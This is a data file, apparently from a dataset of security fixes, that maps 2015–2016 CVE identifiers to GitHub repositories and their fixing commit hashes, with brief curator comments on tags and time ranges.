-CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e5967; -CVE-2015-7528;https://github.com/kubernetes/kubernetes;None:None;False;afd56495a1052a3387b81df1786a8d0f51bc8671,4b1afe5b7483cba2907032b5910fcd41a48bbbec,da039b4a940a471d7025ce882b8392f8de10ea2b,9158aa1f09213c6e7118c55a95442d8a12d496b2; this was kubernetes -CVE-2015-7541;https://github.com/quadule/colorscore;None:None;False;570b5e854cecddd44d2047c44126aed951b61718; -CVE-2015-7559;https://github.com/apache/activemq;None:None;False;338a74dfa42a7b19d39adecacfa5f626a050e807,b8fc78ec6c367cbe2a40a674eaec64ac3d7d1ecb; vulnerable tag is fixed -CVE-2015-7577;https://github.com/rails/rails;None:None;False;0fde6f554b75b13b0435dd70f1c3ec02bc209e0d,5875bc3adeff7583cd2fca756f8c61fcb1bc2366,cdabc95608336dbea7b6a3a3e925de5bbd5313ba,2cb466353f2af080e73eaf66ba033ee27df9b9b5; -CVE-2015-7809;https://github.com/fabpot/Twig;None:None;False;30be07759a3de2558da5224f127d052ecf492e8f; -CVE-2015-8213;https://github.com/django/django;None:None;False;316bc3fc9437c5960c24baceb93c73f1939711e4,3ebbda0aef9e7a90ac6208bb8f9bc21228e2c7da,9f83fc2f66f5a0bac7c291aec55df66050bb6991,8a01c6b53169ee079cb21ac5919fdafcc8c5e172; -CVE-2015-8216;https://github.com/FFmpeg/FFmpeg;None:None;False;d24888ef19ba38b787b11d1ee091a3d94920c76a,fdb884263974b19584a4f37508d71bc60189f512; -CVE-2015-8217;https://github.com/FFmpeg/FFmpeg;None:None;False;93f30f825c08477fe8f76be00539e96014cc83c8,ff30907205fc4a9666a7ee93ca456e3a5bcacbc0; -CVE-2015-8218;https://github.com/FFmpeg/FFmpeg;None:None;False;d4a731b84a08f0f3839eaaaf82e97d8d9c67da46,a7bbb7fb884a02a7b380ef7afa787fca756b9d82; -CVE-2015-8309;https://github.com/devsnd/cherrymusic;None:None;False;62dec34a1ea0741400dd6b6c660d303dcd651e86; -CVE-2015-8310;https://github.com/devsnd/cherrymusic;None:None;False;62dec34a1ea0741400dd6b6c660d303dcd651e86; -CVE-2015-8618;https://github.com/golang/go;None:None;False;0027ed1872cdec08defe3b097c7123eaaf149e30,4306352182bf94f86f0cfc6a8b0ed461cbf1d82c; -CVE-2015-8747;https://github.com/Unrud/Radicale;None:None;False;bcaf452e516c02c9bed584a73736431c5e8831f1; -CVE-2015-8748;https://github.com/Kozea/Radicale;None:None;False;1109973a925970353dfd13c6df8de0e4e446d983,4bfe7c9f7991d534c8b9fbe153af9d341f925f98; -CVE-2015-8814;https://github.com/umbraco/Umbraco-CMS;None:None;False;18c3345e47663a358a042652e697b988d6a380eb; -CVE-2015-8854;https://github.com/markedjs/marked;None:None;False;a37bd643f05bf95ff18cafa2b06e7d741d2e2157; -CVE-2015-8861;https://github.com/handlebars-lang/handlebars.js;None:None;False;83b8e846a3569bd366cf0b6bdc1e4604d1a2077e; -CVE-2015-8862;https://github.com/janl/mustache.js;None:None;False;378bcca8a5cfe4058f294a3dbb78e8755e8e0da5; -CVE-2015-8968;https://github.com/square/git-fastclone;None:None;False;14198fe12443055839b1ba4cc294b04a38ae15f1,a8a33f187214185b885a10bcfe2527c74da84a8c,2b7a0be1ff8a4de2f43338e91649d6c4988bf994,93a4634abca94464387a8bde5a3062e858fc0f1e; -CVE-2015-9235;https://github.com/auth0/node-jsonwebtoken;None:None;False;1bb584bc382295eeb7ee8c4452a673a77a68b687; -CVE-2015-9241;https://github.com/hapijs/hapi;None:None;False;aab2496e930dce5ee1ab28eecec94e0e45f03580; -CVE-2015-9243;https://github.com/hapijs/hapi;None:None;False;270e9a768b2fbb84ab832869d2de606c865f0e85,353bf2661d15f4529e6f70498681a385ec2daa77; -CVE-2015-9251;https://github.com/jquery/jquery;None:None;False;b078a62013782c7424a4a61a240c23c4c0b42614,f60729f3903d17917dc351f3ac87794de379b0cc; -CVE-2016-0750;https://github.com/infinispan/infinispan;None:None;False;f2989a9b7b5ef2d3be690250d9d1bc7b2fa045d7; -CVE-2016-0762;https://github.com/apache/tomcat;None:None;False;970e615c7ade6ec6c341470bbc76aa1256353737,86b2e436099cb48f30dad950175c5beeeb763756; -CVE-2016-1505;https://github.com/Unrud/Radicale;None:None;False;b4b3d51f33c7623d312f289252dd7bbb8f58bbe6; -CVE-2016-1905;https://github.com/deads2k/kubernetes;None:None;False;21a5d57c7551d99d195a38edc8b06bdc807aa4c1,e90c2bd7dcf506dee91f30ea35b3c72f83a38fba; -CVE-2016-2108;https://github.com/openssl/openssl;None:None;False;d7ab691bc479d3cf2eea07329db6ce0e2589f0b9,a0eed48d37a4b7beea0c966caf09ad46f4a92a44,f5da52e308a6aeea6d5f3df98c4da295d7e9cc27,32d3b0f52f77ce86d53f38685336668d47c5bdfe,3661bb4e7934668bd99ca777ea8b30eedfafa871; was 1.0.2b:1.0.2c -CVE-2016-2160;https://github.com/openshift/origin;None:None;False;2d0350c84150d88be4d1ac181694366832a55709,26e798bea2f765fcb48ae351321b7ae38a329201,a77c100b57f481d5a729bebbc8771222e147964d; does not specify versions (1.1.4 is fixed) -CVE-2016-2166;https://github.com/apache/qpid-proton;None:None;False;a0585851e1e8ed9678496e38278f4a7554d03636; fixed tag is vulnerable (happend when using git svn and the copying to github) -CVE-2016-2177;https://github.com/openssl/openssl;None:None;False;a004e72b95835136d3f1ea90517f706c24c03da7,6f35f6deb5ca7daebe289f86477e061ce3ee5f46; -CVE-2016-2512;https://github.com/django/django;None:None;False;c5544d289233f501917e25970c03ed444abbd4f0,ada7a4aefb9bec4c34667b511022be6057102f98,fc6d147a63f89795dbcdecb0559256470fff4380,382ab137312961ad62feb8109d70a5a581fe8350; -CVE-2016-2513;https://github.com/django/django;None:None;False;67b46ba7016da2d259c1ecc7d666d11f5e1cfaab,af7d09b0c5c6ab68e629fd9baf736f9dd203b18e,f4e6e02f7713a6924d16540be279909ff4091eb6; -CVE-2016-2537;https://github.com/mafintosh/is-my-json-valid;None:None;False;eca4beb21e61877d76fdf6bea771f72f39544d9b; -CVE-2016-2788;https://github.com/puppetlabs/marionette-collective;None:None;False;4de959d0eae2b4cfc5ed4a0f5f659d4bf49cbedb,39dc1af951e880bf787d48d860cf0da25e6725ea,4918a0f136aea04452b48a1ba29eb9aabcf5c97d; -CVE-2016-3081;https://github.com/apache/struts;None:None;False;f238cf4f1091be19fbcfd086b042c86a1bcaa7fc,5190b53673a710ead31bbb5f82cf4ca171994629; -CVE-2016-3092;https://github.com/apache/tomcat;None:None;False;8999f8243197a5f8297d0cb1a0d86ed175678a77,2c3553f3681baf775c50bb0b49ea61cb44ea914f,8e67e4a4799a9765b3bd777eed3ee17f00514441; -CVE-2016-3094;https://github.com/apache/qpid-broker-j;None:None;False;24aaee1df7c3e408d89bebbc3426bcdd94dfb6c0,a4c8ecf0ac4884f63cfd57c07c12a144863c896c; -CVE-2016-3114;https://github.com/NexMirror/Kallithea;None:None;False;460fec61ad108252b7f56575211914e0f82ea6e8; -CVE-2016-3693;https://github.com/svenfuchs/safemode;None:None;False;0f764a1720a3a68fd2842e21377c8bfad6d7126f; -CVE-2016-3720;https://github.com/FasterXML/jackson-dataformat-xml;None:None;False;f0f19a4c924d9db9a1e2830434061c8640092cc0; -CVE-2016-3959;https://github.com/golang/go;None:None;False;eb876dd83cb8413335d64e50aae5d38337d1ebb4,2cfbb875208f4acecfb0b72de5aebe37e8d03a35,2d8ecac3d0dbceed8830a43a3e752770577ffed1; -CVE-2016-4000;https://github.com/jython/frozen-mirror;None:None;False;4c337213bd2964bb36cef2d31509b49647ca6f2a; -CVE-2016-4009;https://github.com/python-pillow/Pillow;None:None;False;1723dc2d0709d4e3e65333dfcabcfddd25c0f83e,4e0d9b0b9740d258ade40cce248c93777362ac1e,95a25a0d82f414a52e174eb5389d485d4b3ddf34,41fae6d9e2da741d2c5464775c7f1a609ea03798; -CVE-2016-4055;https://github.com/moment/moment;None:None;False;34af63b8b21208a949dfaf42d228502c73d20ec0,52a807b961ead925be11ff5e632c8f7325a9ce36; -CVE-2016-4425;https://github.com/akheron/jansson;None:None;False;64ce0ad3731ebd77e02897b07920eadd0e2cc318,013c3892c3b7c39516507838ababb4e9167cc65c; -CVE-2016-4438;https://github.com/apache/struts;None:None;False;76eb8f38a33ad0f1f48464ee1311559c8d52dd6d; -CVE-2016-4442;https://github.com/MiniProfiler/rack-mini-profiler;None:None;False;4273771d65f1a7411e3ef5843329308d0e2d257c; -CVE-2016-4465;https://github.com/apache/struts;None:None;False;eccc31ebce5430f9e91b9684c63eaaf885e603f9,a0fdca138feec2c2e94eb75ca1f8b76678b4d152; -CVE-2016-4562;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; -CVE-2016-4563;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; -CVE-2016-4564;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; -CVE-2016-4855;https://github.com/ADOdb/ADOdb;None:None;False;fc80385305963905a3ad9f87e6fb83df4c235198,292e4a9433fe96f02cccc2313a7198efee844214; test file... -CVE-2016-4970;https://github.com/netty/netty;None:None;False;524156f164a910b8b0978d27a2c700a19cd8048f,9e2c400f89c5badc39919f811179d3d42ac5257c; -CVE-2016-4972;https://github.com/openstack/python-muranoclient;None:None;False;b1e8a1753ccc3faf06840f675403645311ac9d79,cd182ba363a11078ae7a0595f54751c1ebddd2e0,e470430814ceddadea66d2e4bb3a9b10b55869e6; -CVE-2016-4974;https://github.com/apache/qpid-jms-amqp-0-x;None:None;False;7e6843e2e1967bfdba477a683353dbf6287d6291; -CVE-2016-4977;https://github.com/spring-projects/spring-security-oauth;None:None;False;fff77d3fea477b566bcacfbfc95f85821a2bdc2d; -CVE-2016-5007;https://github.com/spring-projects/spring-security;None:None;False;e4c13e3c0ee7f06f59d3b43ca6734215ad7d8974; -CVE-2016-5104;https://github.com/libimobiledevice/libimobiledevice;None:None;False;df1f5c4d70d0c19ad40072f5246ca457e7f9849e; -CVE-2016-5180;https://github.com/c-ares/c-ares;None:None;False;65c71be1cbe587f290432bef2f669ee6cb8ac137; -CVE-2016-5386;https://github.com/golang/go;None:None;False;b97df54c31d6c4cc2a28a3c83725366d52329223,cad4e97af8f2e0b9f09b97f67fb3a89ced2e9021,a357d15e9ee36a1232ae071d9968c4cf10a672b4; -CVE-2016-5388;https://github.com/apache/tomcat80;None:None;False;1977bf9df699c571cf3e08c2996533b959d4cb1e; -CVE-2016-5431;https://github.com/nov/jose-php;None:None;False;1cce55e27adf0274193eb1cd74b927a398a3df4b; -CVE-2016-5697;https://github.com/onelogin/ruby-saml;None:None;False;a571f52171e6bfd87db59822d1d9e8c38fb3b995; -CVE-2016-5841;https://github.com/ImageMagick/ImageMagick;None:None;False;d8ab7f046587f2e9f734b687ba7e6e10147c294b; -CVE-2016-5842;https://github.com/ImageMagick/ImageMagick;None:None;False;d8ab7f046587f2e9f734b687ba7e6e10147c294b; -CVE-2016-5851;https://github.com/python-openxml/python-docx;None:None;False;61b40b161b64173ab8e362aec1fd197948431beb; -CVE-2016-6186;https://github.com/django/django;None:None;False;93c538694e6b14a29cb0f52b784a3bfed604fda6,6fa150b2f8b601668083042324c4add534143cb1,d03bf6fe4e9bf5b07de62c1a271c4b41a7d3d158,f68e5a99164867ab0e071a936470958ed867479d; -CVE-2016-6298;https://github.com/latchset/jwcrypto;None:None;False;eb5be5bd94c8cae1d7f3ba9801377084d8e5a7ba; -CVE-2016-6304;https://github.com/openssl/openssl;None:None;False;e408c09bbf7c3057bda4b8d20bec1b3a7771c15b,2c0d295e26306e15a92eb23a84a1802005c1c137,a59ab1c4dd27a4c7c6e88f3c33747532fd144412,ea39b16b71e4e72a228a4535bd6d6a02c5edbc1f; -CVE-2016-6519;https://github.com/openstack/manila-ui;None:None;False;fca19a1b0d42536644212c5d673fbd6866e67c43,eed69d6ac444c27981f7548c7e2fbc37e836c28d,009913d725bee34cef0bd62e47a298025ace2696,89593686ef18f2bd06223b92071b4be2362a5abd; -CVE-2016-6580;https://github.com/python-hyper/priority;None:None;False;7d01a7dc4db83bce50f20d47caf4f37b403a3ecd,1d6321a387d2becaf66dc22a84db31fbbf7f8d51; -CVE-2016-6581;https://github.com/python-hyper/hpack;None:None;False;4529c1632a356cc1ab6a7fdddccd2de60a21e366,940e7d246ed5ecafb6b93be79f90d920b5ece459,15654460f247dd4fae7fa42ab02bd037b352d1b8; -CVE-2016-6652;https://github.com/spring-projects/spring-data-jpa;None:None;False;b8e7fecccc7dc8edcabb4704656a7abe6352c08f,e9bd83f820b98c54d0b5a2ec0f3f1767332a862c,a22c17fc12f7063716cb40c11d1ff4e265ef8556,edd497b9c93b4f364ffc78ca302a05938d499271; vulnerable tag is fixed -CVE-2016-6793;https://github.com/apache/wicket;None:None;False;8faa056f35bb1fe0b21a92d0450a5aadad8f7753,134686ef7185d3f96fec953136ab4847cd36b68d; vulnerable tag is fixed -CVE-2016-6794;https://github.com/apache/tomcat;None:None;False;0b41766456b1980e4f809e13ad6dc9fa912bae7e,f8db078f1e6e8b225f8344e63595113ca34cd408,c1660182010b4255c21c874d69c124370a67784a; fixed tag is vulnerable (changed) -CVE-2016-6796;https://github.com/apache/tomcat;None:None;False;f603f2f4595073f9490e01699d2083112a7c09a7,f97769f50ee2613e1bf27107a01d48907fd993ac,ffa0346fba2946401630291b642f1cff66d6a2be,fb65c5fe6d298195beee11324416a975bea6d701,bec54243e09b4a171f0a0672e5d8d3cdb281f926,1d69a4ddb363ee96b41337495eb7a263f2e01ff7; fixed tag is vulnerable (changed) -CVE-2016-6797;https://github.com/apache/tomcat;None:None;False;b3406e6c318378cbf440f902f9fdbb8b440aef4e,d6b5600afe75e1086dd564344e1d085966e4237d,2859ac3eae132383cb6f3f2042e25d7a4a281b0d; fixed tag is vulnerable (changed) -CVE-2016-6801;https://github.com/apache/jackrabbit;None:None;False;0c00609a172b3af3b86a01abbf5ed473214702ba,4d21cc25649e547520963b0f87300d656050e68c,67f2cc1ac78cd7bb721d556e8be27559efbf4e12,ea75d7c2aeaafecd9ab97736bf81c5616f703244,7fb4ba4a385069378c916b4fac3f145db802acd8,fb4fe3601717201934bcbf6eb604d2e1ef2cb7ad,991cc31a6cc3a5f87fa7951afb939ff7859db789,9e08618c73a852710cfd9904b8558ceb5c1b754c,eae001a54aae9c243ac06b5c8f711b2cb2038700; -CVE-2016-6814;https://github.com/apache/groovy;None:None;False;716d3e67e744c7edeed7cbc3f874090d39355764,4df8b652aa018a5d5d1cda8fba938bf3422db31c; -CVE-2016-6816;https://github.com/apache/tomcat;None:None;False;f96f5751d418ae5a2f550be040daf9c5f7d99256,516bda676ac8d0284da3e0295a7df70391315360,cdc0a935c2173aff60039a0b85e57a461381107c; fixed tag is vulnerable (changed) -CVE-2016-6817;https://github.com/apache/tomcat;None:None;False;079372fc7bac8e2e378942715c9ce26a4a72c07a,85c63227edabbfb4f2f500fc557480a190135d21,8568a2ca230f4fb6aee483eb40fc7e3f28bc8b96; -CVE-2016-6823;https://github.com/ImageMagick/ImageMagick;None:None;False;4cc6ec8a4197d4c008577127736bf7985d632323,c1cf4802653970c050d175a6496fa1f11b7c089e; -CVE-2016-7036;https://github.com/mpdavis/python-jose;None:None;False;73007d6887a7517ac07c6e755e494baee49ef513,89b46353b9f611e9da38de3d2fedf52331167b93; -CVE-2016-7528;https://github.com/ImageMagick/ImageMagick;None:None;False;7be16a280014f895a951db4948df316a23dabc09; -CVE-2016-7569;https://github.com/appc/docker2aci;None:None;False;2ab8826d6957d97ed64e5e29a484af6370eae2e1,54331ec7020e102935c31096f336d31f6400064f,e371d6523193342d193bcef9f446e14d09eefc4d; -CVE-2016-8568;https://github.com/libgit2/libgit2;None:None;False;aae89534961cdb7b445be890a056b67c5d18547f,4974e3a59648095ffa6fce6c5b651a820c0c34b9,dfc2c713433b3a932e4d8b648738e3b63086baec,821042b673675546a265827ea184c6fa14e0623d,a719ef5e6d4a1a8ec53469c7914032ed67922772; -CVE-2016-8569;https://github.com/libgit2/libgit2;None:None;False;dfc2c713433b3a932e4d8b648738e3b63086baec,821042b673675546a265827ea184c6fa14e0623d,aae89534961cdb7b445be890a056b67c5d18547f,4974e3a59648095ffa6fce6c5b651a820c0c34b9,a719ef5e6d4a1a8ec53469c7914032ed67922772; -CVE-2016-8579;https://github.com/appc/docker2aci;None:None;False;2ab8826d6957d97ed64e5e29a484af6370eae2e1,54331ec7020e102935c31096f336d31f6400064f,e371d6523193342d193bcef9f446e14d09eefc4d; -CVE-2016-8610;https://github.com/openssl/openssl;None:None;False;af58be768ebb690f78530f796e92b8ae5c9a4401,22646a075e75991b4e8f5d67171e45a6aead5b48; -CVE-2016-8629;https://github.com/keycloak/keycloak;None:None;False;a78cfa4b2ca979a1981fb371cfdf2c7212f7b6e2,3d46b4c425d39b004566cc78164e1ffbe37d647c; -CVE-2016-8640;https://github.com/geopython/pycsw;None:None;False;2565ab332d3ccae328591ea9054d0387a90f2e86,d83df944b1fc0f266444c31852c7730f0f41db87,522873e5ce48bb9cbd4e7e8168ca881ce709c222,69546e13527c82e4f9191769215490381ad511b2,daaf09b4b920708a415be3c7f446739661ba3753; -CVE-2016-8738;https://github.com/apache/struts;None:None;False;554b9dddb0fbd1e581ef577dd62a7c22955ad0f6; -CVE-2016-8739;https://github.com/apache/cxf;None:None;False;8e4970d931ae72f92c54d170a844b37137b8fda6,9deb2d179758d3da47ce3ea492c2606c0a6a8475,d9e2a6e7260ea12efa5355ffdfbf0b2415bccd14; -CVE-2016-8745;https://github.com/apache/tomcat;None:None;False;16a57bc885e212839f1d717b94b01d154a36943a,cbc9b18a845d3c8c053ac293dffda6c6c19dd92b,143bb466cf96a89e791b7db5626055ea819dad89; test file... -CVE-2016-8747;https://github.com/apache/tomcat;None:None;False;9601a937ff3b7ef5d04b2a0e950d0e44e1bb4cbd,452c8094a665ef6375530e81c033da4eeb2e4865; -CVE-2016-8750;https://github.com/apache/karaf;None:None;False;ff5792d9b19997318c487bd23edb2c5063ca88c6,ac07cb2440ceff94b3001728c1611fc471253d19; -CVE-2016-8867;https://github.com/moby/moby;None:None;False;ed879071ecff0e082ae6e59481f640f89ea87013,d60a3418d0268745dff38947bc8c929fbd24f837; -CVE-2016-9015;https://github.com/hbashton/urllib3;None:None;False;056045a062478e3c3afc2402ec81680d53490876,5e36a7096455ea94fb28b623d64e1f1bad97f822; -CVE-2016-9121;https://github.com/square/go-jose;None:None;False;c7581939a3656bb65e89d64da0a52364a33d2507,7f0dd807d3f3d73bb536898cb7980ddf638ce69a,60e9804a61881698227b7b19c0a11d49d6930e4f; -CVE-2016-9122;https://github.com/square/go-jose;None:None;False;2c5656adca9909843c4ff50acf1d2cf8f32da7e6,350b3415970b0dd6d2ffe4574d5fc0a71a900562; -CVE-2016-9189;https://github.com/python-pillow/Pillow;None:None;False;5fac61d03e1619db086e477c67b12189be6f84b6,fe7b41b4381325a83707ea9bbd0062812dc8dfc2,c50ebe6459a131a1ea8ca531f10da616d3ceaa0f; -CVE-2016-9190;https://github.com/python-pillow/Pillow;None:None;False;5fac61d03e1619db086e477c67b12189be6f84b6,5d8a0be45aad78c5a22c8d099118ee26ef8144af,d4663806a89d28e30cbb9f7eac7b03a04f09cb31; -CVE-2016-9243;https://github.com/pyca/cryptography;None:None;False;b924696b2e8731f39696584d12cceeb3aeb2d874,aebfba28a42b608a2c5f8bf7d45402c415b893a4; -CVE-2016-9298;https://github.com/ImageMagick/ImageMagick;None:None;False;3cbfb163cff9e5b8cdeace8312e9bfee810ed02b; -CVE-2016-9814;https://github.com/simplesamlphp/saml2;None:None;False;7008b0916426212c1cc2fc238b38ab9ebff0748c,f72e98a74083e54f49df2596d4520ae5d5fc80f6,3f268c25ca5e9748652834faad04525746227ef7,2a2bd4398257cbe72251c68348be72707cc77262; -CVE-2016-9878;https://github.com/spring-projects/spring-framework;None:None;False;e2d6e709c3c65a4951eb096843ee75d5200cfcad,a7dc48534ea501525f11369d369178a60c2f47d0,43bf008fbcd0d7945e2fcd5e30039bc4d74c7a98; -CVE-2016-9879;https://github.com/spring-projects/spring-security;None:None;False;6d30da2e1f166ceac339899295e1b8a8ff2f08c4,ed2ae21074b7850d386371b2ab9e29268ef2f0c0,666e356ebc479194ba51e43bb99fc42f849b6175; -CVE-2016-9909;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; -CVE-2016-9910;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; -CVE-2016-9962;https://github.com/opencontainers/runc;None:None;False;5d93fed3d27f1e2bab58bad13b180a7a81d0b378; -CVE-2016-10033;https://github.com/PHPMailer/PHPMailer;None:None;False;833c35fe39715c3d01934508987e97af1fbc1ba0,9743ff5c7ee16e8d49187bd2e11149afb9485eae,4835657cd639fbd09afd33307cef164edf807cdc,ed4e7ce8ad877a8f578139c491c256ab1933c7c9; -CVE-2016-10100;https://github.com/borgbackup/borg;None:None;False;f2f50efc2873636dc7acfcd222e21fe40fe667a5; -CVE-2016-10127;https://github.com/IdentityPython/pysaml2;None:None;False;8c2b0529efce45b94209da938c89ebdf0a79748d,6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; -CVE-2016-10129;https://github.com/libgit2/libgit2;None:None;False;66e3774d279672ee51c3b54545a79d20d1ada834,2fdef641fd0dd2828bd948234ae86de75221a11a,921e3a68e26ad23d9c5b389fdc61c9591bdc4cff,ccee8cabc3fd187046bbfccb407de95dafc310f6,4ac39c76c0153d1ee6889a0984c39e97731684b2,84d30d569ada986f3eef527cbdb932643c2dd037; -CVE-2016-10149;https://github.com/IdentityPython/pysaml2;None:None;False;6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; -CVE-2016-10173;https://github.com/halostatue/minitar;None:None;False;30e62689b614938dc96b4f2cb8e033e72f650670; -CVE-2016-10190;https://github.com/FFmpeg/FFmpeg;None:None;False;2a05c8f813de6f2278827734bf8102291e7484aa,606b21353df7d08ea203193f3026281737c696a2,2e3f0a1c6f39cf2a35bdda85e43970ffc6db797b,18e3e322b36a85b6f69662e1d5fa7c245638ab86,0e0a413725e0221e1a9d0b7595e22bf57e23a09c; -CVE-2016-10191;https://github.com/FFmpeg/FFmpeg;None:None;False;7d57ca4d9a75562fa32e40766211de150f8b3ee7,5bfb0b02b6fbb38c058659dc09c01602d0d1f523,a5513ae7bc7cb131e7b7edba57e4cf93121d6c8e,b0ebef0578fd88fe3efd66086c43a5b43fbc9f6a,32b95471a86ae383c0f76361d954aec511f7043a; -CVE-2016-10192;https://github.com/FFmpeg/FFmpeg;None:None;False;a5d25faa3f4b18dac737fdb35d0dd68eb0dc2156,e0cb113f9b4b7a26ac0053a483f92c26a4a90f0e,1768e02a046ac05cb212991ae23021ad412cd15a,37904d11779482f375b13da24f33f75daf13638f,c12ee64e80af2517005231388fdf4ea78f16bb0e; -CVE-2016-10193;https://github.com/dejan/espeak-ruby;None:None;False;5251744b13bdd9fb0c72c612226e72d330bac143,119b2d6691ed954c84ceaa6e41a6915e6ea01938; -CVE-2016-10345;https://github.com/phusion/passenger;None:None;False;e5b4b0824d6b648525b4bf63d9fa37e5beeae441; -CVE-2016-10522;https://github.com/sferik/rails_admin;None:None;False;b13e879eb93b661204e9fb5e55f7afa4f397537a; -CVE-2016-10524;https://github.com/oliversalzburg/i18n-node-angular;None:None;False;877720d2d9bb90dc8233706e81ffa03f99fc9dc8; -CVE-2016-10526;https://github.com/tschaub/grunt-gh-pages;None:None;False;2d277e3e969ccd4c2d493f3795400fa77e6b6342,590f69767203d8c379fe18cded93bd5ad6cb53cb; fixed tag is vulnerable -CVE-2016-10528;https://github.com/coderaiser/node-restafary;None:None;False;63e4b13c802991bbff2d0af8bd15b0bce9ff971a; -CVE-2016-10529;https://github.com/silverwind/droppy;None:None;False;62ae2cbc87e0e4b7b61205b3d926e275c8f1accc; -CVE-2016-10531;https://github.com/markedjs/marked;None:None;False;2cff85979be8e7a026a9aca35542c470cf5da523; commit outside the time range -CVE-2016-10532;https://github.com/cloudcmd/console-io;None:None;False;62f0fbcb36226436af0dad52ffe4d8cd9a0c533f; -CVE-2016-10536;https://github.com/socketio/engine.io-client;None:None;False;2c55b278a491bf45313ecc0825cf800e2f7ff5c1; -CVE-2016-10538;https://github.com/node-js-libs/cli;None:None;False;ed90515500557e2b82d6ce6004cc9a81fb090501,fd6bc4d2a901aabe0bb6067fbcc14a4fe3faa8b9; questa boh -CVE-2016-10540;https://github.com/isaacs/minimatch;None:None;False;6944abf9e0694bd22fd9dad293faa40c2bc8a955; -CVE-2016-10542;https://github.com/websockets/ws;None:None;False;0328a8f49f004f98d2913016214e93b2fc2713bc,3e1caf42088c7cd236f23b972917588368ad8531; -CVE-2016-10543;https://github.com/hapijs/call;None:None;False;9570eee5358b4383715cc6a13cb95971678efd30; -CVE-2016-10544;https://github.com/uNetworking/uWebSockets;None:None;False;37deefd01f0875e133ea967122e3a5e421b8fcd9; -CVE-2016-10550;https://github.com/sequelize/sequelize;None:None;False;d198d78182cbf1ea3ef1706740b35813a6aa0838; -CVE-2016-10554;https://github.com/sequelize/sequelize;None:None;False;c876192aa6ce1f67e22b26a4d175b8478615f42d; -CVE-2016-10555;https://github.com/hokaccha/node-jwt-simple;None:None;False;957957cfa44474049b4603b293569588ee9ffd97,ecf908a57fce953b5daf0139bcff85eca869a630; vulnerable tag is fixed -CVE-2016-10556;https://github.com/sequelize/sequelize;None:None;False;23952a2b020cc3571f090e67dae7feb084e1be71; -CVE-2016-10557;https://github.com/appium/appium-chromedriver;None:None;False;c5a4caa8c45cd7842537c2031a77a5273cc198c8,c7e384afcddf009636b8e5bb23b1f06150eda293; -CVE-2016-10558;https://github.com/aerospike/aerospike-client-nodejs;None:None;False;d5e916a3a65c169e60200f18f02524c67bb58237; the fixing commit changes a bash script file and some .ini files, while from the advisory we are filtering out only .js files -CVE-2016-10559;https://github.com/groupon/selenium-download;None:None;False;1957ca79707b9bee224b222500ceb250f736b93b; -CVE-2016-10560;https://github.com/hypery2k/galenframework-cli;None:None;False;dcf9505f77f2ea50f84372f9b6b521c89561cbe1; -CVE-2016-10562;https://github.com/barretts/node-iedriver;None:None;False;32ca1602573618c8d76182c4f2a30aee379d6629; this repo has no tag, current timespan gives zero commits -CVE-2016-10564;https://github.com/rubenv/node-apk-parser;None:None;False;5e359c08ba57775857d309c57f9830f19b1cf774; -CVE-2016-10566;https://github.com/davidmarkclements/install-nw;None:None;False;5c64eff1ed116fceeba55a51867554f0fe4f6556; same as above -CVE-2016-10567;https://github.com/connected-web/product-monitor;None:None;False;122122c605a235d5897590c0ef9d3682961707de; -CVE-2016-10568;https://github.com/geoip-lite/node-geoip;None:None;False;29f9db3f25d6d6364e3e2ab274713e6f81e8c695; fixed tag is vulnerable -CVE-2016-10569;https://github.com/nodeca/embedza;None:None;False;19ab5ed72c37a311ba2685f4ef4ed08b3b5c95c3; -CVE-2016-10570;https://github.com/jefflembeck/pngcrush-installer;None:None;False;cf36e9a5492a591493836b7fea69ae3ec34f7f75,d56bc439fc6ed0654b30b345906f77bd000368f3; -CVE-2016-10571;https://github.com/vseryakov/bkjs-wand;None:None;False;3b8d854dd765546ecb77282a6f87406746378dcf; this repo has no tag, current timespan gives zero commits -CVE-2016-10572;https://github.com/Janpot/mongodb-instance;None:None;False;c8fea750f8020ace8410c442b2684b33a9fddd3b; same as above -CVE-2016-10573;https://github.com/tobli/baryton-saxophone;None:None;False;a5e943c46779e5372cdd13bfe2a69ec2530045be; -CVE-2016-10574;https://github.com/zhao0/node-apk-parser3;None:None;False;ba1ade7f677dc5c80fe3f7355794d501b61a7917; -CVE-2016-10575;https://github.com/hakatashi/kindlegen;None:None;False;9a67ba62890ab78597f4c3af36b97e19ea410fa4; -CVE-2016-10576;https://github.com/zazukoians/fuseki;None:None;False;154c0f12c468a8af33562dff12b1bb0e5b659df9; same as above -CVE-2016-10577;https://github.com/ibmdb/node-ibm_db;None:None;False;d7e2d4b4cbeb6f067df8bba7d0b2ac5d40fcfc19; -CVE-2016-10579;https://github.com/giggio/node-chromedriver;None:None;False;71981099216b7c15ec01e50baaacb15fe1b85e56,5ad68a36c3260760f1eb40d9c7906c6ea19c05b3; was 2.26.0:2.26.1 -CVE-2016-10582;https://github.com/dcodeIO/ClosureCompiler.js;None:None;False;c01efe9d86dc8d07e14c5a6ba1586244ce53a698,e59848f5975e5b15279c044daf9cff8ff192bae6; -CVE-2016-10586;https://github.com/macacajs/macaca-chromedriver;None:None;False;03cb4a186b83122383bc2292761d418f519bf3b9; current timespan gives only ten commits -CVE-2016-10587;https://github.com/wasdk/wasdk;None:None;False;58c2d22e7958d921e4f90d56805460ca33918971; this repo has no tag, current timespan gives zero commits -CVE-2016-10588;https://github.com/nwjs/npm-installer;None:None;False;adb4df1e012d38a3872578d484291b9af07aad5b; unknown -CVE-2016-10591;https://github.com/rse/node-prince;None:None;False;c7e355bd3d3e4bc060f102c5264e838f379aa8a8; -CVE-2016-10611;https://github.com/Strider-CD/strider-sauce;None:None;False;5ff6d6593f89aee505b4e86958ab6f8898baa9eb; -CVE-2016-10626;https://github.com/koorchik/node-mystem3;None:None;False;4bd31c0e0110afc327c414d7ebfc2ffe738cbad2; -CVE-2016-10694;https://github.com/tobli/alto-saxophone;None:None;False;ef8d579ae68a95027afd5204ca644cf00cf72b70; 